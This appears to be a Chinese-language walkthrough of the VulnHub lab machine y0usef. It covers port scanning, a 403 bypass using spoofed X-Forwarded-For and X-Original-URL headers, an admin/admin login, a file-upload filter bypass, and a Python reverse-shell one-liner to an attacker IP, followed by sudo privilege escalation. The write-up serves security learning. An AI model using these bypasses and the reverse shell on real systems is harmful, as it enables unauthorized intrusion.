vulnhub)"/>
y0usef(vulnhub)
y0usef(vulnhub)
难度不高,学习到的知识很基础
,624/
目录
1.主机发现
arp-scan -l
2.端口扫描
nmap -p 1-65535 -A 192.168.56.107 -A 强力扫描 直接能发现服务
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)OS details: Linux 3.2 - 4.9
3.漏洞发现
进入网页,没有什么信息,直接上工具,使用whatweb和dirsearch。
whatweb http://192.168.56.107Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.56.107], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]dirsearch -u IP
301 /adminstration -> http://192.168.56.107/adminstration/
访问抓包看看。
403就该放弃了吗?继续尝试!
403Bypass利用方法
1. 旁站绕过的方式:
HOST可以更改,使用域内的主机名,说不定能够绕过2. 通过覆盖URL:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
--》把这个修改成
GET / HTTP/1.1 这里换成根路径
//X-Original-URL:/adminstration 这里换成要访问的 头部还有
//X-Rewrite-URL:/adminstration 把url重写成要访问的url3.通过请求头的方法:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
--》
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
Referer:https://192.168.56.107/adminstration4.以X开头的HTTP头部
X-Originating-IP:127.0.0.1
X-Remote-IP:127.0.0.1
X-forwarded-For:127.0.0.1
尝试尝试
然后你会发现进去了,但是尝试输入账号时,还会403。。所以每次都得加上头部信息。
居然就是弱口令admin,admin。
然后点点页面。还是得加上X-Forwarded-For:127.0.0.1,有个文件上传。
简单说一下绕过的基本方法:
文件扩展名
Content-Type:image/png jpeg 都尝试下
代码内容中添加GIF89a或者PNG
这里文件上传使用image/png就行了
上传成功去链接:地址就是再上传点URL直接拼接。
打开虚拟终端。查找下存在不存在python环境,可以尝试反弹shell.不反弹也可以,蚁剑上可以正常使用,如果想要反弹shell的话可以使用python代码
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
那就去看看文件,查看下flag,但是突然觉得这不只是flag,还可能是base64加密的
解密得到信息
ssh :
user : yousef
pass : yousef123
4.提权
登录后看看信息:发现了sudo-l可以,还是ALL
直接sudo su或者sudo -s 切换到root身份
更多推荐
y0usef(vulnhub)
发布评论